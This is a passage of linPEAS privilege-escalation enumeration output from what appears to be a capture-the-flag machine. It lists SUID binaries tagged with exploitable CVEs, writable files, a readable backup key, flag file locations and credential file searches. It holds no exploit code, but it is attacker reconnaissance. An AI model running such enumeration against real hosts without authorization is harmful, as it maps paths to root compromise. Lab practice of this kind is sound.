PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication yes ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Dec 3 2020 /etc/pam.d -rw-r--r-- 1 root root 2133 Mar 4 2019 /etc/pam.d/sshd ╔══════════╣ Searching tmux sessions ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions tmux 2.6 /tmp/tmux-1000 ╔══════════╣ Analyzing Cloud Init Files (limit 70) -rw-r--r-- 1 root root 3517 Jun 3 2020 /etc/cloud/cloud.cfg lock_passwd: True ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Aug 6 2020 /usr/share/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg gpg Not Found netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 2796 Sep 17 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg -rw-r--r-- 1 root root 2794 Sep 17 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Sep 17 2018 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 3267 Sep 17 2020 /usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 2253 Mar 21 2018 /usr/share/keyrings/ubuntu-esm-keyring.gpg -rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-keyring.gpg -rw-r--r-- 1 root root 1139 Mar 21 2018 /usr/share/keyrings/ubuntu-fips-updates-keyring.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg drwx------ 3 mat mat 4096 Dec 3 2020 /home/mat/.gnupg drwx------ 3 toby toby 4096 Dec 3 2020 /home/toby/.gnupg drwx------ 3 will will 4096 Dec 3 2020 /home/will/.gnupg ╔══════════╣ Analyzing Postfix Files (limit 70) -rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix ╔══════════╣ Analyzing FTP Files (limit 70) -rw-r--r-- 1 root root 69 Oct 7 2020 /etc/php/7.2/mods-available/ftp.ini -rw-r--r-- 1 root root 69 Oct 7 2020 /usr/share/php7.2-common/common/ftp.ini ╔══════════╣ Analyzing Bind Files (limit 70) -rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind ╔══════════╣ Analyzing Interesting logs Files (limit 70) -rw-r----- 1 root adm 40588 Mar 15 21:35 /var/log/apache2/access.log -rw-r----- 1 root adm 8400 Mar 15 21:35 /var/log/apache2/error.log ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc -rw-r--r-- 1 mat mat 3771 Dec 3 2020 /home/mat/.bashrc -rw-r--r-- 1 toby toby 3771 Dec 3 2020 /home/toby/.bashrc -rw-r--r-- 1 will will 3771 Dec 3 2020 /home/will/.bashrc -rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile -rw-r--r-- 1 mat mat 807 Dec 3 2020 /home/mat/.profile -rw-r--r-- 1 toby toby 807 Dec 3 2020 /home/toby/.profile -rw-r--r-- 1 will will 807 Dec 3 2020 /home/will/.profile -rw-r--r-- 1 will will 0 Dec 3 2020 /home/will/.sudo_as_admin_successful ╔═══════════════════╗ ═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid strings Not Found -rwsr-xr-x 1 root root 44K Mar 22 2019 /bin/su -rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping -rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount -rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 37K Mar 22 2019 /usr/bin/newuidmap -rwsr-xr-x 1 root root 75K Mar 22 2019 /usr/bin/gpasswd -rwsr-xr-x 1 root root 40K Mar 22 2019 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 44K Mar 22 2019 /usr/bin/chsh -rwsr-xr-x 1 root root 59K Mar 22 2019 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485) -rwsr-xr-x 1 root root 146K Jan 31 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 37K Mar 22 2019 /usr/bin/newgidmap -rwsr-xr-x 1 root root 75K Mar 22 2019 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-- 1 root messagebus 42K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-x 1 root root 111K Jul 10 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304) -rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 14K Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 427K Mar 4 2019 /usr/lib/openssh/ssh-keysign ╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root shadow 34K Feb 27 2019 /sbin/unix_chkpwd -rwxr-sr-x 1 root shadow 34K Feb 27 2019 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate -rwxr-sr-x 1 root ssh 355K Mar 4 2019 /usr/bin/ssh-agent -rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write -rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall -rwxr-sr-x 1 root shadow 23K Mar 22 2019 /usr/bin/expiry -rwxr-sr-x 1 root shadow 71K Mar 22 2019 /usr/bin/chage -rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root crontab 39K Nov 16 2017 /usr/bin/crontab -rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter ╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf /etc/ld.so.conf.d /etc/ld.so.conf.d/libc.conf /usr/local/lib /etc/ld.so.conf.d/x86_64-linux-gnu.conf /usr/local/lib/x86_64-linux-gnu /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu ╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities Current env capabilities: Current: = Current proc capabilities: CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000 Parent Shell capabilities: 0x0000000000000000= Files with capabilities (limited to 50): /usr/bin/mtr-packet = cap_net_raw+ep ╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities ╔══════════╣ AppArmor binary profiles -rw-r--r-- 1 root root 3194 Mar 26 2018 sbin.dhclient -rw-r--r-- 1 root root 125 Nov 23 2018 usr.bin.lxc-start -rw-r--r-- 1 root root 2857 Apr 7 2018 usr.bin.man -rw-r--r-- 1 root root 26245 Jul 10 2020 usr.lib.snapd.snap-confine.real -rw-r--r-- 1 root root 1550 Apr 24 2018 usr.sbin.rsyslogd -rw-r--r-- 1 root root 1353 Mar 31 2018 usr.sbin.tcpdump ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path /usr/bin/gettext.sh ╔══════════╣ Executable files potentially added by user (limit 70) 2023-03-15+22:32:58.8001830490 /var/lib/lxcfs/cgroup/memory/lxc/ignite/cgroup.event_control 2023-03-15+22:32:58.7213442420 /var/lib/lxcfs/cgroup/memory/lxc/cgroup.event_control 2023-03-15+22:32:58.5625305680 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control 2023-03-15+22:32:58.5599319920 /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control 2023-03-15+22:32:58.4051499210 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control 2023-03-15+22:32:58.2462940790 /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control 2023-03-15+22:32:58.2437717560 /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control 2023-03-15+22:32:58.0848844770 /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control 2023-03-15+22:32:57.9235909120 /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control 2023-03-15+22:32:57.7646404310 /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control 2023-03-15+22:32:57.6056322840 /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control 2023-03-15+22:32:57.6030087450 /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control 2023-03-15+22:32:57.4443690430 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.service/cgroup.event_control 2023-03-15+22:32:57.2895493890 /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control 2023-03-15+22:32:57.2869194760 /var/lib/lxcfs/cgroup/memory/system.slice/vsftpd.service/cgroup.event_control 2023-03-15+22:32:57.1273494540 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control 2023-03-15+22:32:56.9632126360 /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control 2023-03-15+22:32:56.8075595890 /var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control 2023-03-15+22:32:56.8048118850 /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control 2023-03-15+22:32:56.6450469500 /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control 2023-03-15+22:32:56.4851110880 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control 2023-03-15+22:32:56.3254514960 /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control 2023-03-15+22:32:56.3228508690 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control 2023-03-15+22:32:56.1638675950 /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control 2023-03-15+22:32:56.0048304480 /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control 2023-03-15+22:32:56.0021577060 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control 2023-03-15+22:32:55.8471975750 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control 2023-03-15+22:32:55.6880896490 /var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control 2023-03-15+22:32:55.5291645600 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control 2023-03-15+22:32:55.5265410710 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control 2023-03-15+22:32:55.3674181970 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control 2023-03-15+22:32:55.2082542080 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control 2023-03-15+22:32:55.2056642170 /var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control 2023-03-15+22:32:55.0463693230 /var/lib/lxcfs/cgroup/memory/system.slice/amazon-ssm-agent.service/cgroup.event_control 2023-03-15+22:32:54.8899644510 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control 2023-03-15+22:32:54.7265763070 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control 2023-03-15+22:32:54.4914567660 /var/lib/lxcfs/cgroup/memory/cgroup.event_control 2020-12-03+01:34:33.0902259270 /etc/console-setup/cached_setup_terminal.sh 2020-12-03+01:34:33.0862259270 /etc/console-setup/cached_setup_keyboard.sh 2020-12-03+01:34:33.0862259270 /etc/console-setup/cached_setup_font.sh ╔══════════╣ Unexpected in /opt (usually empty) total 12 drwxr-xr-x 3 root root 4096 Dec 3 2020 . drwxr-xr-x 24 root root 4096 Dec 12 2020 .. drwxrwx--- 2 root adm 4096 Dec 3 2020 backups ╔══════════╣ Unexpected in root /initrd.img.old /vmlinuz /vmlinuz.old /initrd.img /swap.img ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files total 36 drwxr-xr-x 2 root root 4096 Aug 6 2020 . drwxr-xr-x 95 root root 4096 Dec 12 2020 .. -rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh -rw-r--r-- 1 root root 825 Jul 10 2020 apps-bin-path.sh -rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh -rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh -rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh -rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh -rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/mat/.bash_history /home/ftpuser /home/ftpuser/ftp/flag_2.txt /home/toby/.bash_history /root/ /var/www /var/www/html /var/www/html/bunch.php /var/www/html/css /var/www/html/css/bootstrap.min.css.map /var/www/html/css/bootstrap.min.css /var/www/html/round.php /var/www/html/.htaccess /var/www/html/robots.txt /var/www/html/secret_file_do_not_read.txt /var/www/html/striped.php /var/www/html/more_secrets_a9f10a /var/www/html/more_secrets_a9f10a/flag_3.txt /var/www/html/images /var/www/html/images/placemat1.jpg /var/www/html/images/placemat2.jpg /var/www/html/images/placemat3.jpg /var/www/html/flag_1.txt /var/www/html/post.php /var/www/html/index.php ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) /home/mat/scripts ╔══════════╣ Readable files belonging to root and readable by me but not world readable -rw-rw---- 1 root adm 2270 Dec 3 2020 /opt/backups/key.b64 -rw-r----- 1 root adm 40588 Mar 15 21:35 /var/log/apache2/access.log -rw-r----- 1 root adm 8400 Mar 15 21:35 /var/log/apache2/error.log -rw-r----- 1 root adm 0 Dec 3 2020 /var/log/apache2/other_vhosts_access.log -rw-r----- 1 root adm 28898 Dec 12 2020 /var/log/apt/term.log ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /tmp/cow.jpg /var/log/journal/ec6c05333ff74080b8bd26a785d12724/system.journal /var/log/auth.log /var/log/syslog logrotate 3.11.0 ╔══════════╣ Files inside /home/mat (limit 20) total 312 drwxr-xr-x 6 mat mat 4096 Dec 3 2020 . drwxr-xr-x 6 root root 4096 Dec 3 2020 .. lrwxrwxrwx 1 root root 9 Dec 3 2020 .bash_history -> /dev/null -rw-r--r-- 1 mat mat 220 Dec 3 2020 .bash_logout -rw-r--r-- 1 mat mat 3771 Dec 3 2020 .bashrc drwx------ 2 mat mat 4096 Dec 3 2020 .cache -rw-r--r-- 1 mat mat 270433 Dec 3 2020 cow.jpg -rw------- 1 mat mat 37 Dec 3 2020 flag_5.txt drwx------ 3 mat mat 4096 Dec 3 2020 .gnupg drwxrwxr-x 3 mat mat 4096 Dec 3 2020 .local -rw-r--r-- 1 will will 141 Dec 3 2020 note.txt -rw-r--r-- 1 mat mat 807 Dec 3 2020 .profile drwxrwxr-x 3 will will 4096 Mar 15 21:59 scripts ╔══════════╣ Files inside others home (limit 20) /home/mat/cow.jpg /home/mat/note.txt /home/mat/scripts/__pycache__/cmd.cpython-36.pyc /home/mat/scripts/cmd.py /home/mat/.bashrc /home/mat/.bash_logout /home/mat/flag_5.txt /home/mat/.profile /home/ftpuser/ftp/flag_2.txt /home/ftpuser/ftp/files/payload_ivan.php /home/toby/jobs/cow.sh /home/toby/note.txt /home/toby/.bashrc /home/toby/flag_4.txt /home/toby/.bash_logout /home/toby/.profile /var/www/html/bunch.php /var/www/html/css/bootstrap.min.css.map /var/www/html/css/bootstrap.min.css /var/www/html/round.php ╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 5850 Feb 5 2018 /etc/vsftpd.conf.bak -rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old -rw-r--r-- 1 root root 7857 Dec 9 2020 /lib/modules/4.15.0-128-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 7905 Dec 9 2020 /lib/modules/4.15.0-128-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 7857 Nov 23 2020 /lib/modules/4.15.0-126-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 7905 Nov 23 2020 /lib/modules/4.15.0-126-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 11755 Dec 3 2020 /usr/share/info/dir.old -rw-r--r-- 1 root root 1397 Aug 6 2020 /usr/share/sosreport/sos/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc -rw-r--r-- 1 root root 1758 Mar 24 2020 /usr/share/sosreport/sos/plugins/ovirt_engine_backup.py -rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz -rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz -rw-r--r-- 1 root root 35544 Mar 25 2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 217469 Nov 23 2020 /usr/src/linux-headers-4.15.0-126-generic/.config.old -rw-r--r-- 1 root root 0 Nov 23 2020 /usr/src/linux-headers-4.15.0-126-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Nov 23 2020 /usr/src/linux-headers-4.15.0-126-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 217469 Dec 9 2020 /usr/src/linux-headers-4.15.0-128-generic/.config.old -rw-r--r-- 1 root root 0 Dec 9 2020 /usr/src/linux-headers-4.15.0-128-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Dec 9 2020 /usr/src/linux-headers-4.15.0-128-generic/include/config/net/team/mode/activebackup.h ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /var/lib/mlocate/mlocate.db: regular file, no read permission ╔══════════╣ Web files?(output limit) /var/www/: total 12K drwxr-xr-x 3 root root 4.0K Dec 3 2020 . drwxr-xr-x 14 root root 4.0K Dec 3 2020 .. drwxr-xr-x 5 root root 4.0K Dec 3 2020 html /var/www/html: total 60K drwxr-xr-x 5 root root 4.0K Dec 3 2020 . drwxr-xr-x 3 root root 4.0K Dec 3 2020 .. ╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-r--r-- 1 root root 220 Apr 4 2018 /etc/skel/.bash_logout -rw------- 1 root root 0 Aug 6 2020 /etc/.pwd.lock -rw-r--r-- 1 root root 1531 Dec 3 2020 /etc/apparmor.d/cache/.features -rw-r--r-- 1 root root 20 Mar 15 21:20 /run/cloud-init/.instance-id -rw-r--r-- 1 root root 2 Mar 15 21:19 /run/cloud-init/.ds-identify.result -rw-r--r-- 1 mat mat 220 Dec 3 2020 /home/mat/.bash_logout -rw-r--r-- 1 will will 220 Dec 3 2020 /home/will/.bash_logout -rw-r--r-- 1 toby toby 220 Dec 3 2020 /home/toby/.bash_logout -rw-r--r-- 1 landscape landscape 0 Aug 6 2020 /var/lib/landscape/.cleanup.user -rw-r--r-- 1 root root 47 Dec 3 2020 /var/www/html/.htaccess ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rw-r--r-- 1 mat mat 270433 Mar 15 22:43 /tmp/cow.jpg -rwxr-xr-x 1 will will 828098 Feb 10 20:38 /tmp/linpeas.sh -rw-rw---- 1 root adm 2270 Dec 3 2020 /opt/backups/key.b64 -rw-r--r-- 1 root root 31202 Dec 12 2020 /var/backups/apt.extended_states.0 -rw-r--r-- 1 root root 3363 Dec 3 2020 /var/backups/apt.extended_states.1.gz ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files /dev/mqueue /dev/shm /home/will /home/will/.bash_logout /home/will/.bashrc /home/will/.cache /home/will/.cache/motd.legal-displayed /home/will/.config /home/will/.config/lxc /home/will/.config/lxc/config.yml /home/will/.config/lxc/cookies /home/will/flag_6.txt /home/will/.gnupg /home/will/.gnupg/private-keys-v1.d /home/will/.profile /home/will/.sudo_as_admin_successful /run/lock /run/screen /tmp /tmp/.font-unix /tmp/.ICE-unix /tmp/linpeas.sh /tmp/.Test-unix /tmp/tmux-1000 #)You_can_write_even_more_files_inside_last_directory /var/crash /var/lib/lxcfs/cgroup/memory/cgroup.event_control /var/lib/lxcfs/cgroup/memory/lxc/cgroup.event_control /var/lib/lxcfs/cgroup/memory/lxc/ignite/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/amazon-ssm-agent.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-serialx2dgetty.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/vsftpd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control /var/lib/php/sessions /var/tmp ╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files Group will: /home/will/.config/lxc/config.yml Group adm: /opt/backups /opt/backups/key.b64 ╔══════════╣ Searching passwords in history files ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /bin/systemd-ask-password /bin/systemd-tty-ask-password-agent /etc/pam.d/common-password /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py /usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc /usr/share/dns/root.key /usr/share/doc/git/contrib/credential /usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c /usr/share/doc/git/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c /usr/share/man/man1/git-credential.1.gz /usr/share/man/man1/git-credential-cache.1.gz /usr/share/man/man1/git-credential-cache--daemon.1.gz /usr/share/man/man1/git-credential-store.1.gz #)There are more creds/passwds files in the previous parent folder /usr/share/man/man7/gitcredentials.7.gz /usr/share/man/man8/systemd-ask-password-console.path.8.gz /usr/share/man/man8/systemd-ask-password-console.service.8.gz /usr/share/man/man8/systemd-ask-password-wall.path.8.gz /usr/share/man/man8/systemd-ask-password-wall.service.8.gz #)There are more creds/passwds files in the previous parent folder /usr/share/pam/common-password.md5sums /usr/share/ubuntu-advantage-tools/modules/credentials.sh /var/cache/debconf/passwords.dat 